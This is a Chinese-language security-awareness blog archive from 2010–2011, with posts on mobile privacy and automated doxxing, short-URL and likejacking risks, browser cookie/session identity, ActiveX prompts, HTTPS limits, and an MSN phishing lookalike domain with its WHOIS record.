資安之我見 (What I see)

個人隱私：「我回不去了」‧‧‧（網路上裸奔

2011-08-21T12:08:00.000+08:00

[行動裝置爆炸的年代]
前兩年大家都在講「雲」，講造雲，今年開始「端」終於正式成形了。

也許很多人會說，「PC & NB」不就是端點了嗎？不，我認為不是這樣的。如果它真的是端點，哪過去十年不也是雲端了嗎？這又有何不同呢？我想過去這兩年，大家也認為這樣的雲端只不過是舊瓶新裝罷了。況且，這樣的端點，除了運算能力，其他的就一無是處了。這樣的「端」太遜了。

哪究竟啥是「端」呢？是的，如果大家有去今年初的「台北國際資訊安全科技展暨亞太資訊安全論壇」，聽一兩場「新科技-行動安全」的場子，你就會發現「智慧型手機」與「平板電腦」站出來了。站出來還不夠，還得有硬功夫才行。

我們來看看有何硬功夫，先看看「端」與「PC & NB」有哪些相同的地方：運算能力、儲存空間、數位鏡頭、喇叭、麥克風；「智慧型手機」與「平板電腦」除了數位鏡頭較佳外，這些相同之處一點都不起眼，甚至遜色很多，尤其是運算能力及儲存空間，這些行動裝置是遠遠比不上的，但十年後也許就很難說了。

另外，那有哪些不同之處呢？這可就是「智慧型手機」與「平板電腦」的超強項目了，我們來看看：

連線網路：包含 Bluetooth、Wi-Fi、3G、WiMax、4G…等各種連線能力，只要有訊號就能通聯。未來，我想會朝向強化端與端之間的互連上。
數位鏡頭：至少應該都是200萬畫素以上，目前主流是500萬畫數，有的還能提供 1080P 的拍攝功能，以後拿來拍外星人的影片就不會這麼模糊了。
GPS 定位：就是可以找到行動裝置的功能，只是這行動裝置多半在你身上。所以衍生很多其他特別用途的功效。
電子羅盤：指南針、指北針，隨時隨地都可以算風水。
陀螺儀：這就是會讓螢幕自動轉來轉去的功能。
氣壓計：這個功能好，配合地圖及GPS，這樣就有 3D的地圖了。
光傳感器：這能讓螢幕自動配合光線來調整亮度，白天不會太暗、半夜不會太亮。
加速傳感器：這…mmm…，也許行動裝置可以偵測是否在墜落中，並啟動安全氣囊之類的…嗯…幾乎啦。
另外，別忘了還有一個麥克風的收音功能啊!!
創意無限之APP：上述硬體加上雲服務，就能蹦出各種新花樣。甚至是從沒想過的創意功能出現。上述描述的功能說明，極可能只是九牛一毛，只要有創意就會有無限的雲服務；而端點只要有新硬體支援，雲服務就會有新創意。

一台手上的行動裝置，就有遠比「PC & NB」還要強大的硬體支援。你能想像一台「電腦」被植入惡意程式，與一台「行動」裝置被植入惡意程式，哪一個比較嚴重呢？這答案交給你決定。

我在意的是另一個問題 -「隱私權」。2010年初，Facebook創辦人提出了一個觀念，「隱私權的時代已經過去」，當時我也的確不能太能接受，但是否有思考這句話的涵義呢？也許今天看完這篇文，應該能讓你接受這句話。

根據 Gartner 的報告，2010年全球智慧型手機共1.2億支，有六分之一的人使用。今年「平板電腦」將會有爆發性的成長。預計到2015年都會有倍數成長，也預估2015年「行動裝置」上網總數會超過PC，我想「行動裝置」應該包含NB吧。目前數據有點混亂，我也不知該引用哪些數據，總之「智慧型手機」與「平板電腦」到2015年都會一直成長。

[不斷創新的雲服務]
新的端，將會造就新的雲。不斷創新的端，就會有源源不絕創意的雲服務。而端的持有者就是「人」。雖然「PC & NB」也是人在操作，但除了運算能力外「PC & NB」根本不是對手，況且，我還是會把「PC & NB」定義為商業用途。而「智慧型手機」與「平板電腦」將會透過以人為基礎的社群媒介連接至「雲服務」，而這也是為何端在前兩年的使用像斷線的風箏，少了雲服務，端點將不像端點，即便端點再智慧也沒用。

看看目前 Web2.0 的社群媒介發展狀況，如下圖。

(圖片來源：http://www.fredcavazza.net/2010/12/14/social-media-landscape-2011/)

這張圖應該可以很清出的描述 Web2.0 現況。每個小圈圈都出現領先者，其中 Facebook 又最龐大，已經吃掉許多外圍的圈圈了，只剩三、四個圈圈還沒有，也許 Facebook 推出打卡(Check-In)之後，下一個推出的可能是即時視訊或即時影音功能了。

如果你已經打算或已經購買「智慧型手機」或「平板電腦」，下列服務或功能是你務必要知道及了解的。

[適地性服務(Location Based Services, LBS)]
結合「GPS 定位」硬體所衍生出來的服務。這是目前最熱門的雲服務-打卡(Check-In)，有兩個網站很熱門：「Foursquare」及「Gowalla」。Foursquare：融合遊戲概念與LBS的行動裝置應用，擁有勳章系統以刺激使用者持續發掘地點。Gowalla：與Foursquare相似，擁有更豐富的視覺設計以及將個別地點串成Trip行程任務的概念設計，另外還有虛擬寶物的概念。

我想大家應該也知道Facebook 推出打卡功能了，只能說它的功能還很簡單的，我想不久就會有以 Facebook 到店家打卡，可享受店家服務的促銷。簡單的說，結合社群的行銷手法才是王道。端點的「GPS 定位」結合雲服務還能玩出很多新花樣。加上端點的「氣壓計」硬體，又能增加更多趣味，同樣都是在 101 打卡，但是在頂樓打卡就是比較屌。

光這個硬底子功能，就讓你透露出多少個人隱私呢？

延伸資料閱讀：
iPhone定位門事件
Apple針對iPhone記錄定位資訊一事發表的正式新聞稿「Apple Q&A on Location Data」全文翻譯
http://www.google.com.tw/search?q=iphone+定位

[人臉辨識(Face Recognition)]
結合「數位鏡頭」硬體所衍生出來的服務。這應該不算新，但發展無限。有些數位相機也提供這類功能，Facebook 也提供對上傳照片進行人臉辨識功能，不過還需要手動填寫人名；如果全自動做到比對好友大頭照呢？這將會是關鍵一步，這樣就能告訴你誰在照片中。我認為這技術應該已經成熟，只是何時適合推出？誰在用？如何用？

我想大家都知道街頭巷弄有錄影設備，目前還是以類比訊號居多。假設全台的街頭巷弄錄影訊號數位化後，並具備有人臉辨識功能，加上警局的連線，有這樣的一天會有多驚人。我並不反對，但誰在用？如何用？

即便人臉辨識已經有完整、成熟的技術，但最終，還是要具備有完整的「人臉圖片資料庫」，才能得以發揮，誰擁有最多的圖片資料庫，且能持續更新成長才是最大贏家。

這個硬底子功能，不但讓你的隱私不保，連帶周邊的親朋好友，甚至背景的路人甲都隱私不保。且很多時候，還是你自己上傳到雲服務上的，當然啦!!它用備份的名義來包裝。

延伸資料閱讀：
Google的以圖像進行搜尋
社交網站臉部辨識功能
Google買下PittPatt 準備強化人臉搜尋功能？
http://www.google.com.tw/search?q=臉部辨識

[物體辨識(Object Recognition, OR)]
結合「數位鏡頭」硬體所衍生出來的服務。科技的進步，不僅可以告訴你誰在照片中，還能告訴你他們在哪裡，靠的不是 GPS 定位，是靠圖片中的街景、建築物、景觀、地標…等線索。想想 google 的街景地圖是由成億上兆的圖片組成的，要是能比對你圖片中的背景呢?
換句話說，一張圖片除了洩漏你，還洩漏了你的地點。直接用一張圖來說明應該會比較快，如下圖：

(圖片來源：http://techorange.com/2011/03/01/schmidt-mobile-growth/)

[擴增實境(Augmented Reality, AR)]
這名詞其實已經不是太新的。可以查查維基百科，你會發現在1990年就已經有人提出這個概念了，過去沒聽過沒關係，但現在你不知不可。某種程度還需要上面兩個的技術為基礎才行，上面兩個的技術只做到「識別」，識別之後連結哪些資料，或輸出哪些關連資訊，這就是屬於擴增實境的範圍了。

現況來說，擴增實境的議題在前兩年已經有不少。但，新端點才是讓這功能得以發揮的關鍵因素。預估未來幾年，這概念實作的服務將會大放異彩，魚幫水水幫魚，這些雲服務也才能刺激更多人購買行動裝置，兩者相輔相成。

擴增實境的概念我可以想到這些雲服務，當然這列出的只是九牛一毛而以：

你有興趣的商品拍個照，雲服務會告訴你哪裡買最便宜。
將行動裝置對街頭掃描，就可以找到最優惠的餐廳，或網友最推薦的小吃…等等。
真實世界加上虛擬的尋寶遊戲，以真實世界為背景，透過行動裝置來獲取雲服務線索並加以解答，最後找到真正的寶物。
以上是往好的想，另外一方面想，就可能出現的是全自動化的人肉搜尋系統了。

如果要更加了解擴增實境的概念，可以參考「Mr./Ms. Days」的「虛擬與現實的結合：Augmented Reality初探」一文：
http://mmdays.com/2009/09/25/augmented-reality-for-dummies/

[問題來了]
我們先撇除一般性的資安問題，我們只看隱私權的部分。回到事件的根本：以人為基礎的社群媒介，傳遞的內容當然與當事人息息相關，因此也將大量曝露隱私資訊，這些訊息還都是當事人親至上傳到雲服務的，使用的越多，你就越沒有隱私權利。

無意中聽到的談話、拍照，雲服務會告訴我：who it is。

找到一張有興趣的圖片，雲服務會告訴我：who it is and where they are。

我想就直接以圖片來了解：

(圖片翻拍自：http://www.youtube.com/watch?v=tb0pMeg1UN0)

(圖片翻拍自：http://www.youtube.com/watch?v=tb0pMeg1UN0)

這是TAT公司的一個作品：Augmented ID。只要將行動裝置，對準你有興趣的人進行追蹤即可。當然，很快的就能查到你「公開」的個人資料。

對於社群媒介的使用越緊密，你在雲裡也留下越多的足跡。還記得傳說中的「中指蕭」事件嗎？三、五年之後再回頭看，你可能會對傳統「人肉搜尋」技術落後給予冷笑以對，很快的會有新科技、全自動化的系統來取代的。

[杯具]
那麼多的雲服務、APP，不管是好人還是壞人都在蒐集的你隱私資料。

延伸資料閱讀：
商業週刊第1228期的封面故事 - 新裸奔時代
http://www.google.com.tw/search?hl=zh-TW&q=惡意APP

參考資料：

「虛擬與現實的結合：Augmented Reality初探」：(http://mmdays.com/2009/09/25/augmented-reality-for-dummies/)
「Augmented Reality on Mobile 」：(http://blog.fihspec.com/idc/?p=28)
http://zh.wikipedia.org/wiki/擴增實境
Google施密特：行動應用成長速度，超過了所有人預期：(http://techorange.com/2011/03/01/schmidt-mobile-growth/)

亦投稿於「資安人雜誌，2011. 5.6.月號. No.75，社交網站人肉搜索與隱私」

上網安全之邪惡短網址 (Surfing Secure for URL Shortening Services)

2011-04-03T20:12:00.003+08:00

先利用 google 搜尋關鍵字：「短網址」，就可以知道何謂短網址。或者查詢維基百科(Wiki)也行。

常見短網址服務的網域有：
http://tinyurl.com/
http://0rz.tw/
http://0rz.com/
http://ppt.cc/
http://goo.gl/
http://bit.ly/
... ... 其他好多!! 總之我用邪惡短網址稱呼。也許它全然不是壞的，但是幾百個短網址連結，出現一個問題，可能就很頭大；問題是如果要檢查幾百個短網址可能更頭大，你該如何自處呢？點還不點連結？

短網址在網路上使用越來越廣泛了，就連 google 也加入短網址服務，這類短網址還有很多並沒有在清單中。絕大部分的短網址有個特色，域名很短且域名之後為一串固定長度的英數字組成，對於短網址必須具有基本識別能力。對於網站中出現的短網址也必須加以注意，因為，它很容易被利用，做為隱藏惡意連結或惡意網域之用。

為了抓個圖，讓網友了解，等了許久這圖終於出現了：

這可是相當典型的「Likejacking」手法，而且還配合短網址做利用。相關資料可以參考這裡還有這裡。應該很多人已經點擊該連結了吧，問題是都沒感覺有發生過啥問題...XD。FB 現在還是很甜蜜的，再過段時日，就會有一堆垃圾、廣告、行銷的東東，甚至是惡意連結，出現在大家的牆上，沒辦法，別忘了 FB 可是要取代 EMail 的。

與短網址有異曲同工之妙的，如「OWASP Top 10 for 2010」中，A10: Unvalidated Redirects and Forwards(未驗證的轉址與轉送)。短網址都大辣辣的提供服務了，相較之下，Unvalidated Redirects and Forwards 的問題實在沒啥大不了的。話說回來，把這兩個搭在一起，再做點變形，還蠻好玩的哩，可以更隱密的隱藏惡意連結...@@。

對於網站上短網址的出現，需加以留意。若出現在即時通訊(MSN, Yahoo Messenger, google talk, skype …等)，那就該更加小心。因為，你不知它會連結到哪個網頁上。

其他 Web 常見攻擊手法或衍生資安問題

網頁掛馬手法
魚叉式網路釣魚
關鍵字查詢利用(SEO Poison)
惡意程式的下載與執行
網路個人資料外洩
金融交易資料外洩
網路交易詐騙
詐騙網站、郵件
偽防毒網站(流氓軟體)
人肉搜尋
社群網站的個資
不當網路留言、不當上傳影音照片
內部機敏資料的外洩

結論：
對於企業用戶而言，相信也擺脫不了瀏覽器，無論是存取內部網站或外部網頁，端點安全一直都是企業難以建全防護的地方。對於威脅而言，透過惡意網頁的滲透，很多時候也不需要高深的技術，只需要一個完美策劃的劇本，這將在在考驗企業的用戶。如何修正使用者上網觀念成為重要課題，也僅以此篇文章，與 IT 人員在推廣使用者教育訓練上，提供一些參考方向與觀念內容，強化使用者上網的觀念。

完整文章亦投稿於「資安人雜誌，2011. Jan/Feb. No.73，你的上網行為安全嗎?」
相關系列文章：
「上網安全之HTTPS/SSL (Surfing Secure for HTTPS/SSL)」
「上網安全之Active X (Surfing Secure for Active X)」
「上網安全之Cookie/Session (Surfing Secure for Cookie/Session)」

上網安全之Cookie/Session (Surfing Secure for Cookie/Session)

2011-03-14T12:05:00.002+08:00

Cookie/Session 不注意，無法確保網路身份遭到冒用或濫用。

這個議題很嚴重，但卻沒人注意問題的嚴重性。目前主流的瀏覽器都有所謂「Tab」功能，IE 稱為「索引標籤」、Chrome & FireFox稱為「分頁」、Safari還用到兩個名稱「索引標籤」與「標籤頁」。要特別注意，目前這些新版瀏覽器，只要是同類瀏覽器，不管你開啟幾個視窗或幾個「Tab」，預設來說都會擁有相同的 Cookie/Session 身份，因為對於系統來說，預設它們都處於一個相同的 Process上。這跟早期的瀏覽器運作很不一樣，早期一個瀏覽器視窗會有獨立的 Process，因此，Cookie/Session 身份很容易切割。

這會帶來甚麼問題呢？看看下圖。如果已經在一個「Tab」登入了 MSN，這時另外一個「Tab」登入 FB 之後，如果點擊了「尋友工具」，會有甚麼結果呢？

答案是：FB 會自動到把 MSN 的好友清單，匯出到 FB 的邀請朋友清單中，進行邀請朋友的動作，過程中並不需要輸入 MSN 的帳號密碼。問題就來了，你知道你目前正以哪一個身份瀏覽該網站嗎？這也是網友該了解的一個基本觀念，否則，無法確保身份遭到冒用或濫用。

如果要在同一瀏覽器下切割「視窗」或「Tab」使用不同身份，可以 google 搜尋關鍵字：「多重帳號同時登入」，可以找到一些方法，已經有很多網友提供意見，其中最方便使用的是 FireFox 的 CookiePie 套件，可以用「Tab」來切割，這點很重要，因為其它很多類似的 Cookie 管理工具並沒有「Tab」的概念存在；其他比較簡單的是 IE，只需在啟動捷徑上加入參數"-nomerge"，這樣Cookie/Session 身份可以限制在「同一個 IE視窗」。

最簡單的方式，就是不改預設狀況下，使用不同瀏覽器來切割，但我相信這方式應該無法滿足絕大多數的網友。現今來說，瀏覽器一開，登入五、六個帳號以上大概是基本動作了，而這兩年社群網站的興起，更增加許多網站的彼此互動性，如「推」、「讚」、「噗」、「分享」…等，如下圖，這些動作都與 Cookie/Session 身份有莫大的關係。當然，大部分的網站是不會惡意利用，但，遇到釣魚網站或惡意網站，可能結果就不會如網友預期的結果。

之前也有針對臉書的攻擊行動，可參考「Facebook 出現點閱綁架(Clickjacking)之攻擊手法分析」一文，其中攻擊過程就有使用到跨視窗 Cookie/Session 的。國外稱此為「Likejacking」攻擊手法。

最近，很多網站流行要按「讚」才看得到文章的網站。臉書上也有人發起「要按讚才能觀看嗎？拒絕強迫按讚」的活動，這類都是一種身份濫用的狀況，利用你的身份來推銷文章，很多時候這些文章一點意義也沒有...XD。預期未來這類狀況會越來越嚴重。

另外，分享對 FireFox 之 CookiePie 套件使用經驗，此套件在部分網站上會導致驗證不過的問題，或導致一些瀏覽瑕疵。所以我倒過來使用的，也就是說看到 CookiePie 運作下時，該瀏覽過程是沒有 Cookie/Session 身份在瀏覽器的「Tab」中，如下圖，先開啟空白的「Tab」，再開啟CookiePie 運作，使該「Tab」沒有 Cookie/Session 身份在其中，在此進行一般上網瀏覽的行為。

完整文章亦投稿於「資安人雜誌，2011. Jan/Feb. No.73，你的上網行為安全嗎?」

上網安全之Active X (Surfing Secure for Active X)

2011-03-05T23:17:00.003+08:00

當心遭惡意利用 Active X 元件軟體。

這問題經常發生於早期首頁綁架、彈出式廣告視窗...等，瀏覽器異常狀況的問題起因。

Active X 是 IE 瀏覽器上，很特別的一個功能，也僅能在 IE 瀏覽器上使用，其他瀏覽器如 FireFox、Chrome 等，並未支援 Active X 功能。首先，你一定得要先看看微軟對 Active X 的說明：「在電腦上安裝 ActiveX 控制項是否安全？」
網址為：http://www.microsoft.com/taiwan/protect/yourself/downloads/activex.mspx

Active X 翻譯中文，很多人用「附加元件」的名稱，但要注意，FireFox 也有所謂的「附加元件」，不過英文是「Add-on」，其兩者功能與作用上很類似，但實際上是不一樣的，所以，還是以英文來稱呼，比較不容易搞混。至於 Chrome 也有類似的功能，稱為「Google Chrome Extensions (Google 瀏覽器擴充功能)」。這些所謂的套件或元件並不能跨瀏覽器使用的，目前 FireFox 與 Chrome 的附加元件或擴充功能，有進行一些機制的控管，但是也要注意使用到惡意的附加元件或擴充功能，導致瀏覽器的異常。建議由下列網址抓取附加元件或擴充功能會比較安全：
FireFox：https://addons.mozilla.org/
Chrome：https://chrome.google.com/extensions
至於，Active X 就沒有統一的管控機制，因此也比較容易被利用，這也是對此特別說明的原因。

Active X 出現畫面：

有些比較舊的 IE 版本有可能出現畫面：

尤其是後面這個畫面也有很多瀏覽者有網路誤解，以為可以提高瀏覽的安全性，所以閉著眼睛點擊，這是不對的；話又說回來，這畫面跟 Active X 看起來一點關係也沒有，難怪使用者會誤會。若出現上面兩張圖，它代表「目前瀏覽的網站，要在瀏覽器(IE)上安裝附加元件，你是否同意？」，這個動作有相當程度的危險性。

早期很多惡意程式都會利用 Active X 方式，安裝到使用者的電腦中，導致首頁被綁架或不斷跳出廣告視窗…等，都是因為這個原因。來看一下一個有問題的「安全性警告」：

(參考「網路攻防戰」:http://anti-hacker.blogspot.com/2007/10/blog-post_12.html)

所以，哪時該點「是」？哪時又該點「否」呢？很重要的一個觀念：「你是否信任目前瀏覽的網站，如果有疑慮避免點擊是或同意的選項」。以目前來說，瀏覽網際網路很多時候取決於你是否信任該網站，很多端點防護軟體或資安設備都類似這樣的觀念在運作，像「網站信譽評等軟體（Web Reputation Services－WRS）」的運作就幾乎一樣，而這將會是你在上網警覺性上，很重要的一個基礎觀念。

假設，你目前正在瀏覽網路銀行或 WebATM 網頁，這些網站的運作也都會使用到 Active X 元件，在確認你瀏覽的網站確實是銀行的網址，並非釣魚網頁後，也都安裝Active X 元件才能正常使用網路銀行或 WebATM 功能。

假設，你正在瀏覽賭博或色情網站，網頁出現需要安裝 Active X 元件，這時，你還進行安裝動作，這時，你的風險相對增加很多，很可能就安裝了惡意的元件，導致瀏覽器的異常發生。

對於各瀏覽器的「附加元件」，網友都要小心安裝使用，這就跟目前很流行的 APP 概念(iPhone的APP、Fackbook 的APP)類似，要是不小心使用遭惡意利用的 APP 哪就麻煩了。

完整文章亦投稿於「資安人雜誌，2011. Jan/Feb. No.73，你的上網行為安全嗎?」

上網安全之HTTPS/SSL (Surfing Secure for HTTPS/SSL)

2011-02-19T12:40:00.005+08:00

上網安全這是個很大的議題，尤其在電子郵件的用戶端程式 Web 化後，網友只要以瀏覽器就能完成所有事情，不過還是有部分網友習慣使用特定的收信軟體，如Outlook…等，主要原因還是用於同步周邊裝置，如早期的 PDA、智慧型手機…等。但，大部分的網友，多半只要有瀏覽器就可以完成上網作業以及所需工作。
當使用者對瀏覽器的依賴持續加深，成為不可或缺的工具，相對的，對瀏覽器的操作使用就必須更加深入了解才行，善用工具、正確使用、建立防護觀念，將會是網友持續努力的一個課題。

這邊將針對 SSL (Secure Sockets Layer) 、 Active X、Cookie/Session 身份管控、短網址...等各部分來說明，為了灌水使網友充分了解，這裡將分文說明：

首先是 SSL，它並不代表這個網站是很安全、不會被入侵的。

SSL 是一種加密技術，主要用於網際網路的傳輸加密，指的是「瀏覽器」與「網站」之間，透過網際網路時，會使用加密技術傳遞資料，避免他人在中間竊取網路封包，窺探網友的瀏覽網頁內容資訊；一般大多實作為 HTTPS 方式，也就是說瀏覽網站的網址開頭會是「https://xxx.xxx/」，但要注意的是並非「https」開頭，就表示有加密，必須要多識別一個圖示：

(圖片來源：http://www.microsoft.com/hk/athome/chinese/security/images/online/74349_https_F.jpg)

對，就是一個「安全鎖」的圖案，這個圖案在各瀏覽器呈現的位置會不太一樣，且一定要出現在該出現的位置才正確。沒錯!!問題又來了。誰知道該出現在哪裡呀？很抱歉這是網路生存的基本技巧，只要網路使用者，你就必須了解，就跟吃飯呼吸一樣。

很多網站會把「HTTPS」與「網站安全」劃上等號，這是網路誤解。這不能怪網友，很多網站是刻意把這等號劃上的，詳細原因~~這就不多說了~~在這裡可以砲用力一點，因為，這個網站能做的資訊安全就這麼多了，要更多的資訊安全也沒有了，如果還有問題，哪...一定是網友的問題...XD，所以消毒先。網友一定要知道，「HTTPS」只保障「瀏覽器」與「網站」之間的網路傳輸安全；另外還有端點的問題，也就是說，網站主機或瀏覽器主機還是可能遭植入惡意程式，而遭受攻擊。

回到先前話題，如何知道「HTTPS」的加密功能正在運作呢？不同瀏覽器「安全鎖」的圖案該出現在哪裡呢？你可以試著以瀏覽器連結下列網址：「https://encrypted.google.com/」，找到「安全鎖」的圖案，如下圖：

在了解「安全鎖」的圖案的位置之後，接下來就是要確定這些「安全鎖」必須經得起考驗了，這也是瀏覽者可以驗證圖示的正確性。可以點擊這些「安全鎖」圖案，去查詢所謂「憑證」的內容，如下圖：

「憑證」的內容中包含許多資訊，其中詳細資訊包含的加密使用的相關技術，關係著這是否有機會破密的可能性，對瀏覽使用者來說只能被動性的接受；但，瀏覽使用者必須了解一點，上圖中「發給」(有的瀏覽器會用「網站」)的網域，必須與瀏覽器「瀏覽的網域(或稱網址名稱)」要契合，且這個網站的網址是沒有問題(確實是你要瀏覽的網站)的。在瀏覽的過程中，看到「安全鎖」圖案正常的運作，就表示網路通訊是有在加密保護下的。

這是識別釣魚網站的技巧之一，其他識別釣魚網站方式可以本部落格，例如「模擬實戰釣魚網站(Challenge to Phishing-II) Part-II」。了解以上幾個動作之後，接下來就是了解其應用了，你必須了解何謂「全程加密」與「登入加密」，簡單的說，「全程加密」是自帳號登入開始，到帳號登出的過程都是在加密的狀態；而「登入加密」只有在帳號登入的動作進行加密。所以「登入加密」只保護了使用者帳號密碼，「全程加密」保護了更多資料內容。若您使用網路銀行時，應該是「全程加密」還是「登入加密」呢？

另外，您使用網頁存取電子郵件時，是「全程加密」還是「登入加密」呢？Gmail已經在2010年初就使用「全程加密」了，Hotmail於2010年11月出也推出「全程加密」功能，不過，還需要使用者手動開啟「全程加密」的功能；Yahoo信箱目前還只有「登入加密」的功能。對於瀏覽者經常使用的電子郵件信箱，提供哪些保護，也是網友應該去加以了解的。

Facebook也開始提供「全程加密」功能了，就在2011年一月底，可以參考這裡。它也是需要手動開啟的喔!!

另外，「全程加密」也會有假貨...lol。

來看這張圖顯示的訊息：

這是 IE 8 才有的特別功能，預設狀況下是會跳出此視窗的。來看看微軟的說法：「為何當使用 IE 8 瀏覽網站時，總會跳出安全性警告視窗？」中「問題的來龍去脈」。這是在說啥呢？即便是「全程加密」，但過程中仍有部分網頁內容是沒有經過加密的。哪些網頁內容有加密哪些沒加密呢？這也不是使用者能選擇的，也許重要的網頁內容資訊是沒有加密的哩。目前國內還有許多證券網站、網路銀行還是會跳出這訊息視窗的，網友可得多加注意呀!!

講白一點好了。出現上面的警告視窗，即便有 HTTPS 但可能一點用也沒有，純唬你的... ...哀哉。啊... ...沒看到這警告視窗，借問可是用 IE 8。

～～問世間資安為何物，直叫鄉民出生入死～～

完整文章亦投稿於「資安人雜誌，2011 Jan/Feb. No.73，你的上網行為安全嗎?」

當個資都不個資了

2011-01-22T14:03:00.000+08:00

社群浪潮席捲網路後，接續，有的入口網站也玩起了無生意、山寨文化、一窩蜂的把戲。

還記得你的 MSN 及 Yahoo 帳號嗎？還記得上面填寫了哪些個資呢？你的交友資訊呢？它們可能都一一被公開了。

如果這舉動在兩三年以前做，可能會被網路鄉民公嗶到嗶(礙於網路善良風氣，部分已消音處理)。但，物轉星移，竟...一...片...寂...靜...，鄉民聚眾裸奔。

看看畫面如何：

MSN-所有朋友

Yahoo-關係列表

兩者都不約而同的，把交友資訊公開了，其中，MSN 部分偶找了半天，還是找無類似「關閉社群」的功能...XDDDDDD。Yahoo 則找不到「關閉部落格」的功能。另外，這些「被公開」的資料，何時公開？怎公開的？偶都沒映像了...@@。

雖然，MSN 上「檢視個人檔案」的功能一直存在，但，目前預設開放了更多資訊，尤其是「朋友清單」。所以，鄉民還是檢視一下自己的個人檔案，把相關資訊關閉吧!!

人肉搜尋新武器：

怎感覺 MSN 是在採取報復手段呀~~@@

當個資都不個資了，還個資麼。

後註：
剛看到一則新聞-「ＭＳＮ又強迫更新網友怨新版爛還要更新」。
原來，所謂安全性修補，防範用戶上社群網站時，被盜取資料。做法就是「公開它」，這樣沒有竊取與外洩問題了。
如何閃避個資法呢？哈~~微軟提供非常有創意的解法...XD，看起來，確實是招奇招。

原本按耐心中怒火，可是...實在...我嗶他嗶個嗶，嗶嗶嗶嗶嗶嗶嗶嗶嗶嗶...。
唉~~想不到百年首發，不能大過年說好話。

MSN-Phishing on Christmas Eve

2010-12-25T12:16:00.000+08:00

注意看網址：www.log1nlive.net
看到這邊應該就知在幹啥了吧!!...不會帳密又掉了吧~~~XD

整個詐騙風格有點變化了，劇本有更細膩了。
看看真的吧：https://login.live.com/

相似字元又現江湖了。
還有哪些特徵呢？之前都有講了喔~~就留給大家整理了。

依慣例還是要查一下 WHOIS 留個記錄：
=====
WHOIS - log1nlive.net
Registrar: XIN NET TECHNOLOGY CORPORATION
Status: ok
Dates: Created 13-dec-2010 Updated 13-dec-2010 Expires 13-dec-2011
DNS Servers: NS5.MYHOSTADMIN.NET NS6.MYHOSTADMIN.NET

Domain Name : log1nlive.net
PunnyCode : log1nlive.net
Creation Date : 2010-12-13 17:56:11
Updated Date : 2010-12-13 17:56:11
Expiration Date : 2011-12-13 17:56:11

Registrant:
Organization : wu feng
Name : wu feng
Address : sheng yu lin shi
City : cheng du
Province/State : GX
Country : cn
Postal Code : 610031

Administrative Contact:
Name : wu feng
Organization : wu feng
Address : sheng yu lin shi
City : cheng du
Province/State : GX
Country : cheng du
Postal Code : 610031
Phone Number : 86-0775-7232124
Fax : 86-0775-7232124
Email : *********@qq.com

Technical Contact:
Name : wu feng
Organization : wu feng
Address : sheng yu lin shi
City : cheng du
Province/State : GX
Country : cheng du
Postal Code : 610031
Phone Number : 86-0775-7232124
Fax : 86-0775-7232124
Email : *********@qq.com

Billing Contact:
Name : wu feng
Organization : wu feng
Address : sheng yu lin shi
City : cheng du
Province/State : GX
Country : cheng du
Postal Code : 610031
Phone Number : 86-0775-7232124
Fax : 86-0775-7232124
Email : *********@qq.com
=====

先前資料參考：
「騙取MSN帳密的釣魚網站...真多!!」
「老梗!!但就是能唬人!!(MSN Phishing)」
「模擬實戰釣魚網站(Challenge to Phishing-II) Part-II」

對於預測2010年的資安威脅報告(Security Threat Report:Trends for 2010)

2010-12-17T22:51:00.004+08:00

時序歲末，又將是新的一年即將來到。這個時節，也正是年度資安威脅報告統計分析成果公佈的時節，對於來年也會做些趨勢的推估、預測。這邊特別蒐集了一些有公佈安威脅報告的資料，大多為一年前所公佈的，個人反到偏愛以回顧的方式來看這些威脅報告，經過一年的風風雨雨，回顧起來更有感觸。如果再多看一些陳年的年度報告，也許會覺得當時做資安算是簡單的哩!!怎當年也是搞得暈頭轉向咧~~XD

應該看的理由：
1. 找到資安防禦方向或重點，對資安廠商來說掌握趨勢，也掌握先機。
2. 年度威脅報告，乃資安廠商投資、建置、蒐集、統計、分析而來的，有的是資安廠商蒐集相關網路資訊而來的，要寫出一份好的報告，說簡單也不簡單，但要寫出一份切中未來趨勢，就有其難處，由這也可以看出其對威脅報告用心。
3. 驗證目前防禦現況，是否符合內部的威脅分析報告或數據。
4. 我要打十個。
5. 將部分主題內容，作為一般教育訓練教材之方向，並加強宣導資安觀念。很多攻擊手法都是針對「人」來著，需要修正的是「人」的觀念。

不該看的理由：
1. 夾帶置入性行銷內容。
2. 威脅報告內容不夠全面性，不夠客觀，容易陷入迷思。這點確實如此，看威脅報告時，還要注意公佈資安廠商的屬性，畢竟分析內容還是在其專業領域中。
3. 沒有內部威脅分析報告，也沒關心外在風雨，無從驗證。
4. 不知道內容都在講啥。
5. 該做的都做都做不完了，哪還有時間管新的問題。

無論是啥理由，對於 2010 年度的報告或預測，這裡整理一些網路上蒐集到的，可以快速檢視一下，也許會有些不同防禦想法或創意發想的：
(依據資料公佈時間排序)

McAfee Lab: 2010 年資安威脅預測

在使用者不斷成長的同時，社交網路（如 Facebook）將會面臨更多複雜的資安威脅。
Facebook 及其他網路服務應用程式的爆發式成長將會成為網路罪犯的理想目標所在，這些攻擊將會利用好友信任關係去點選一般使用者可能會小心防範的網路連結。
HTML 5 將會弭平桌上型及網路應用程式的界限。這也會讓像是 Google Chrome OS 作業系統成為惡意程式作者「獵殺」一般使用者的新潛在危機。
電子郵件的附件成為傳送惡意程式途徑已行之有年，但它仍然持續增加；不斷地愚弄著企業、媒體記者及一般使用者，下載木馬及其他惡意程式。
由於微軟產品的普及，網路罪犯長久以來都是挑它們下手。但在 2010 年，可以預期的是 Adobe 軟體將成為矚目焦點，特別是 Acrobat Reader 和 Flash 兩項。
針對銀行設計的木馬程式將會變得更聰明，可能會攔截合法的交易而進行未經授權的提款。
僵屍網路 (Botnet) 是網路罪犯的先進基礎架構，常被罪犯利用盜用身來分發送垃圾郵件。近來成功關閉了一些僵屍網路，已迫使這些主事者另尋替代方案；包含點對點傳輸設定 (peer-to-peer setups) 在內，能用來下指令的資訊安全漏洞已愈來愈少。
雖然僵屍網路遍布全球，但我們預測仍能在 2010 年在與網路罪犯的爭鬥中取得一定程度的勝利。

資料來源：McAfee 2010 威脅預測 @2009/12/xx

M86 Security™ 發佈2010年資安威脅報告：

殭屍網路（Botnet）將更形複雜
假冒安全軟體（Scareware）持續增加
中毒的搜尋引擎結果
網站感染的進化
SaaS及雲端服務的定位前景
運用協力廠商應用程式
國際網域名稱濫用
攻擊應用程式開發介面
網址縮短服務隱藏邪惡手段

資料來源：M86 Security 新聞 @2009/12/04

趨勢科技2010年資安威脅預測報告：

網際網路基礎架構的變遷為網路犯罪者開啟了更多的機會。
網路犯罪者將利用社交媒體與社交網路混入使用者的「信賴圈」。
